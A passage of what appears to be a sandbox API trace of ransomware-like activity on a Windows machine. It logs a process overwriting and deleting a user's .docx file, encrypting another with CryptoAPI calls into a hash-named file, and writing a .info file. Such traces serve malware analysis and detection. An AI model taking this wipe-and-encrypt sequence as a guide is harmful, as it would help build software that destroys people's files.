lpBuffer=0x222cec8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.475] WriteFile (in: hFile=0x36c, lpBuffer=0x222cec8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x222cec8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.476] WriteFile (in: hFile=0x36c, lpBuffer=0x222cec8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x222cec8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.477] WriteFile (in: hFile=0x36c, lpBuffer=0x222cec8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x222cec8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.478] WriteFile (in: hFile=0x36c, lpBuffer=0x222cec8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x222cec8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.478] WriteFile (in: hFile=0x36c, lpBuffer=0x222cec8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x222cec8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.479] WriteFile (in: hFile=0x36c, lpBuffer=0x222cec8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x222cec8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.480] WriteFile (in: hFile=0x36c, lpBuffer=0x222cec8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x222cec8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.481] WriteFile (in: hFile=0x36c, lpBuffer=0x222cec8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x222cec8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.481] WriteFile (in: hFile=0x36c, lpBuffer=0x222cec8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x222cec8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.481] WriteFile (in: hFile=0x36c, lpBuffer=0x222cec8*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x1bf5daa8, lpOverlapped=0x0 | out: lpBuffer=0x222cec8*, lpNumberOfBytesWritten=0x1bf5daa8*=0x200, lpOverlapped=0x0) returned 1 [0075.482] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0075.482] WriteFile (in: hFile=0x36c, lpBuffer=0x222cec8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x222cec8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.483] WriteFile (in: hFile=0x36c, lpBuffer=0x222cec8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x222cec8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.484] WriteFile (in: hFile=0x36c, lpBuffer=0x222cec8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x222cec8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.485] WriteFile (in: hFile=0x36c, lpBuffer=0x222cec8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x222cec8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.485] WriteFile (in: hFile=0x36c, lpBuffer=0x222cec8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x222cec8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.486] WriteFile (in: hFile=0x36c, lpBuffer=0x222cec8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x222cec8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.487] WriteFile (in: hFile=0x36c, lpBuffer=0x222cec8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x222cec8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.487] WriteFile (in: hFile=0x36c, lpBuffer=0x222cec8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x222cec8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.488] WriteFile (in: hFile=0x36c, lpBuffer=0x222cec8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x222cec8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.489] WriteFile (in: hFile=0x36c, lpBuffer=0x222cec8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x222cec8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.489] WriteFile (in: hFile=0x36c, lpBuffer=0x222cec8*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x1bf5daa8, lpOverlapped=0x0 | out: lpBuffer=0x222cec8*, lpNumberOfBytesWritten=0x1bf5daa8*=0x200, lpOverlapped=0x0) returned 1 [0075.489] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0075.491] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db18*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db18*=0) returned 0x0 [0075.491] SetEndOfFile (hFile=0x36c) returned 1 [0075.492] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db18*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1bf5db18*=0) returned 0x0 [0075.492] CloseHandle (hObject=0x36c) returned 1 [0075.492] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pLHg8_t9.docx", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pLHg8_t9.docx", lpFilePart=0x0) returned 0x35 [0075.492] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0075.492] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pLHg8_t9.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\plhg8_t9.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.492] GetFileType (hFile=0x36c) returned 0x1 [0075.492] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0075.492] GetFileType (hFile=0x36c) returned 0x1 [0075.492] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5db78, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0075.492] CloseHandle (hObject=0x36c) returned 1 [0075.493] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pLHg8_t9.docx", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pLHg8_t9.docx", lpFilePart=0x0) returned 0x35 [0075.493] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0075.493] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pLHg8_t9.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\plhg8_t9.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.493] GetFileType (hFile=0x36c) returned 0x1 [0075.493] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0075.493] GetFileType (hFile=0x36c) returned 0x1 [0075.493] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5db78, lpLastWriteTime=0x0) returned 1 [0075.493] CloseHandle (hObject=0x36c) returned 1 [0075.493] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pLHg8_t9.docx", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pLHg8_t9.docx", lpFilePart=0x0) returned 0x35 [0075.493] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0075.493] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pLHg8_t9.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\plhg8_t9.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.493] GetFileType (hFile=0x36c) returned 0x1 [0075.493] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0075.493] GetFileType (hFile=0x36c) returned 0x1 [0075.493] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5db78) returned 1 [0075.493] CloseHandle (hObject=0x36c) returned 1 [0075.494] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pLHg8_t9.docx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pLHg8_t9.docx", lpFilePart=0x0) returned 0x35 [0075.494] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pLHg8_t9.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\plhg8_t9.docx")) returned 1 [0075.500] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pLHg8_t9.docx", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pLHg8_t9.docx", lpFilePart=0x0) returned 0x35 [0075.500] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3C3A646563F35BB0FFC065E4A6B2A436", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3C3A646563F35BB0FFC065E4A6B2A436", lpFilePart=0x0) returned 0x48 [0075.500] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0075.500] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3C3A646563F35BB0FFC065E4A6B2A436" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3c3a646563f35bb0ffc065e4a6b2a436"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.500] GetFileType (hFile=0x36c) returned 0x1 [0075.500] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0075.500] GetFileType (hFile=0x36c) returned 0x1 [0075.501] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5dc18, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0075.501] CloseHandle (hObject=0x36c) returned 1 [0075.501] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3C3A646563F35BB0FFC065E4A6B2A436", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3C3A646563F35BB0FFC065E4A6B2A436", lpFilePart=0x0) returned 0x48 [0075.501] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0075.501] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3C3A646563F35BB0FFC065E4A6B2A436" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3c3a646563f35bb0ffc065e4a6b2a436"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.501] GetFileType (hFile=0x36c) returned 0x1 [0075.501] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0075.501] GetFileType (hFile=0x36c) returned 0x1 [0075.501] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5dc18, lpLastWriteTime=0x0) returned 1 [0075.501] CloseHandle (hObject=0x36c) returned 1 [0075.501] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3C3A646563F35BB0FFC065E4A6B2A436", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3C3A646563F35BB0FFC065E4A6B2A436", lpFilePart=0x0) returned 0x48 [0075.501] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0075.501] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3C3A646563F35BB0FFC065E4A6B2A436" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3c3a646563f35bb0ffc065e4a6b2a436"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.501] GetFileType (hFile=0x36c) returned 0x1 [0075.501] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0075.501] GetFileType (hFile=0x36c) returned 0x1 [0075.502] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5dc18) returned 1 [0075.502] CloseHandle (hObject=0x36c) returned 1 [0075.502] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\r33XDXTp.docx", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\r33XDXTp.docx", lpFilePart=0x0) returned 0x35 [0075.502] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\r33XDXTp.docx", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\r33XDXTp.docx", lpFilePart=0x0) returned 0x35 [0075.503] CryptImportKey (in: hProv=0x1a5b7d10, pbData=0x2230220, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5da20 | out: phKey=0x1bf5da20*=0x4ce9f0) returned 1 [0075.503] CryptContextAddRef (hProv=0x1a5b7d10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0075.503] CryptExportKey (in: hKey=0x4ce9f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x0, pdwDataLen=0x1bf5db30 | out: pbData=0x0*, pdwDataLen=0x1bf5db30*=0x1c) returned 1 [0075.503] CryptExportKey (in: hKey=0x4ce9f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x2230310, pdwDataLen=0x1bf5db30 | out: pbData=0x2230310*, pdwDataLen=0x1bf5db30*=0x1c) returned 1 [0075.503] CryptImportKey (in: hProv=0x1a5b7d10, pbData=0x2230430, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5d9f0 | out: phKey=0x1bf5d9f0*=0x1a626b40) returned 1 [0075.503] CryptContextAddRef (hProv=0x1a5b7d10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0075.503] CryptContextAddRef (hProv=0x1a5b7d10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0075.503] CryptDuplicateKey (in: hKey=0x1a626b40, pdwReserved=0x0, dwFlags=0x0, phKey=0x1bf5d9e0 | out: phKey=0x1bf5d9e0*=0x1a6269f0) returned 1 [0075.503] CryptContextAddRef (hProv=0x1a5b7d10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0075.503] CryptSetKeyParam (hKey=0x1a6269f0, dwParam=0x4, pbData=0x2230578*=0x1, dwFlags=0x0) returned 1 [0075.503] CryptSetKeyParam (hKey=0x1a6269f0, dwParam=0x1, pbData=0x2230528, dwFlags=0x0) returned 1 [0075.503] CryptDestroyKey (hKey=0x1a626b40) returned 1 [0075.503] CryptReleaseContext (hProv=0x1a5b7d10, dwFlags=0x0) returned 1 [0075.504] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\r33XDXTp.docx", nBufferLength=0x105, lpBuffer=0x1bf5d450, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\r33XDXTp.docx", lpFilePart=0x0) returned 0x35 [0075.504] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d930) returned 1 [0075.504] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\r33XDXTp.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\r33xdxtp.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.504] GetFileType (hFile=0x36c) returned 0x1 [0075.504] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8a0) returned 1 [0075.504] GetFileType (hFile=0x36c) returned 0x1 [0075.504] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8D54870050B66787F2BEED84FC4D9A29", nBufferLength=0x105, lpBuffer=0x1bf5d450, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8D54870050B66787F2BEED84FC4D9A29", lpFilePart=0x0) returned 0x48 [0075.504] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d930) returned 1 [0075.504] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8D54870050B66787F2BEED84FC4D9A29" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8d54870050b66787f2beed84fc4d9a29"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x358 [0075.504] GetFileType (hFile=0x358) returned 0x1 [0075.504] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8a0) returned 1 [0075.504] GetFileType (hFile=0x358) returned 0x1 [0075.505] ReadFile (in: hFile=0x36c, lpBuffer=0x2230928, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5da28, lpOverlapped=0x0 | out: lpBuffer=0x2230928*, lpNumberOfBytesRead=0x1bf5da28*=0x2e4a, lpOverlapped=0x0) returned 1 [0075.505] CryptEncrypt (in: hKey=0x1a6269f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2244940*, pdwDataLen=0x1bf5da80*=0x2e40, dwBufLen=0x2e40 | out: pbData=0x2244940*, pdwDataLen=0x1bf5da80*=0x2e40) returned 1 [0075.506] WriteFile (in: hFile=0x358, lpBuffer=0x2244940*, nNumberOfBytesToWrite=0x2e40, lpNumberOfBytesWritten=0x1bf5da18, lpOverlapped=0x0 | out: lpBuffer=0x2244940*, lpNumberOfBytesWritten=0x1bf5da18*=0x2e40, lpOverlapped=0x0) returned 1 [0075.507] ReadFile (in: hFile=0x36c, lpBuffer=0x2230928, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5da28, lpOverlapped=0x0 | out: lpBuffer=0x2230928*, lpNumberOfBytesRead=0x1bf5da28*=0x0, lpOverlapped=0x0) returned 1 [0075.507] CryptEncrypt (in: hKey=0x1a6269f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x22477c0*, pdwDataLen=0x1bf5d9c0*=0x10, dwBufLen=0x10 | out: pbData=0x22477c0*, pdwDataLen=0x1bf5d9c0*=0x10) returned 1 [0075.507] CryptEncrypt (in: hKey=0x1a6269f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2247810*, pdwDataLen=0x1bf5d9c0*=0x0, dwBufLen=0x10 | out: pbData=0x2247810*, pdwDataLen=0x1bf5d9c0*=0x10) returned 1 [0075.507] WriteFile (in: hFile=0x358, lpBuffer=0x2247860*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x1bf5d948, lpOverlapped=0x0 | out: lpBuffer=0x2247860*, lpNumberOfBytesWritten=0x1bf5d948*=0x10, lpOverlapped=0x0) returned 1 [0075.507] CloseHandle (hObject=0x358) returned 1 [0075.508] CloseHandle (hObject=0x36c) returned 1 [0075.508] CryptDestroyKey (hKey=0x4ce9f0) returned 1 [0075.508] CryptReleaseContext (hProv=0x1a5b7d10, dwFlags=0x0) returned 1 [0075.508] CryptReleaseContext (hProv=0x1a5b7d10, dwFlags=0x0) returned 1 [0075.508] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8D54870050B66787F2BEED84FC4D9A29", nBufferLength=0x105, lpBuffer=0x1bf5d480, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8D54870050B66787F2BEED84FC4D9A29", lpFilePart=0x0) returned 0x48 [0075.508] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d960) returned 1 [0075.508] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8D54870050B66787F2BEED84FC4D9A29" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8d54870050b66787f2beed84fc4d9a29"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.508] GetFileType (hFile=0x36c) returned 0x1 [0075.508] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8d0) returned 1 [0075.508] GetFileType (hFile=0x36c) returned 0x1 [0075.508] ReadFile (in: hFile=0x36c, lpBuffer=0x2248f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2248f58*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.510] ReadFile (in: hFile=0x36c, lpBuffer=0x2248f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2248f58*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.511] ReadFile (in: hFile=0x36c, lpBuffer=0x2248f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2248f58*, lpNumberOfBytesRead=0x1bf5da48*=0xe50, lpOverlapped=0x0) returned 1 [0075.512] ReadFile (in: hFile=0x36c, lpBuffer=0x2248f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2248f58*, lpNumberOfBytesRead=0x1bf5da48*=0x0, lpOverlapped=0x0) returned 1 [0075.512] CloseHandle (hObject=0x36c) returned 1 [0075.513] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8D54870050B66787F2BEED84FC4D9A29.info", nBufferLength=0x105, lpBuffer=0x1bf5d200, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8D54870050B66787F2BEED84FC4D9A29.info", lpFilePart=0x0) returned 0x4d [0075.513] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d6e0) returned 1 [0075.513] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8D54870050B66787F2BEED84FC4D9A29.info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8d54870050b66787f2beed84fc4d9a29.info"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.520] GetFileType (hFile=0x36c) returned 0x1 [0075.520] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d650) returned 1 [0075.520] GetFileType (hFile=0x36c) returned 0x1 [0075.520] WriteFile (in: hFile=0x36c, lpBuffer=0x2255618*, nNumberOfBytesToWrite=0x77d, lpNumberOfBytesWritten=0x1bf5d7b8, lpOverlapped=0x0 | out: lpBuffer=0x2255618*, lpNumberOfBytesWritten=0x1bf5d7b8*=0x77d, lpOverlapped=0x0) returned 1 [0075.521] CloseHandle (hObject=0x36c) returned 1 [0075.522] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\r33XDXTp.docx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\r33XDXTp.docx", lpFilePart=0x0) returned 0x35 [0075.522] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5da70) returned 1 [0075.522] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\r33XDXTp.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\r33xdxtp.docx"), fInfoLevelId=0x0, lpFileInformation=0x1bf5db50 | out: lpFileInformation=0x1bf5db50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x65348f60, ftCreationTime.dwHighDateTime=0x1d4e5e2, ftLastAccessTime.dwLowDateTime=0x5aa029a0, ftLastAccessTime.dwHighDateTime=0x1d4db66, ftLastWriteTime.dwLowDateTime=0x5aa029a0, ftLastWriteTime.dwHighDateTime=0x1d4db66, nFileSizeHigh=0x0, nFileSizeLow=0x2e4a)) returned 1 [0075.522] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da30) returned 1 [0075.522] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\r33XDXTp.docx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\r33XDXTp.docx", lpFilePart=0x0) returned 0x35 [0075.522] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\r33XDXTp.docx", dwFileAttributes=0x80) returned 1 [0075.522] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS 